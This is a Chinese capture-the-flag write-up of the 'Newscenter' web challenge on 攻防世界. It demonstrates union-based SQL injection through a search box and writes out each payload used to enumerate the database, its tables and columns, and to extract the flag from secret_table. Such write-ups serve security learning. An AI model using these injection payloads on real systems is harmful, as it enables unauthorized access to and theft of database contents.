攻防世界-Web-Newscenter

0x01

打开题目看到一个网页,里面只有一个搜索输入框是我们可以控制的,所以猜测可能是SQL注入。尝试123asdqwe' or 1=1#发现能够查询出所有新闻。

继续尝试' union select 1,2,3#,验证select查询了三个字段:

攻防世界-Web-Newscenter_第1张图片

0x02

已经可以判定是联合注入,接下来就简单了。

查询当前数据库

1' union select 1,2,database()#,得到数据库为news
攻防世界-Web-Newscenter_第2张图片

查询当前库中的表

1' union select 1,table_name,3 from information_schema.tables where table_schema='news'#获得两个表名:news和secret_table

攻防世界-Web-Newscenter_第3张图片

查询表中的列

猜测flag极有可能在secret_table里面,下面就查询其中的列名:
1' union select 1,column_name,3 from information_schema.columns where table_name='secret_table'#得到列名有fl4g
攻防世界-Web-Newscenter_第4张图片

查询flag列的值

1' union select 1,fl4g,3 from secret_table#获取flag
攻防世界-Web-Newscenter_第5张图片

备注

该题是POST类型的注入。当我在测试SQL注入漏洞时使用了常用的1' and '1'='1发现并不能验证漏洞。这里我猜测可能是题目中使用了like来限定条件而不是等号。
如果输入是1,那么后端拼接完成的语句可能是like '%1%',这样就会找出含有1的内容,而我输入1' and '1'='1就会被拼接成like '%1' and '1'='1%1'显然是不成立搜不出任何东西。然而用or就可以验证。

你可能感兴趣的:(WriteUp,安全)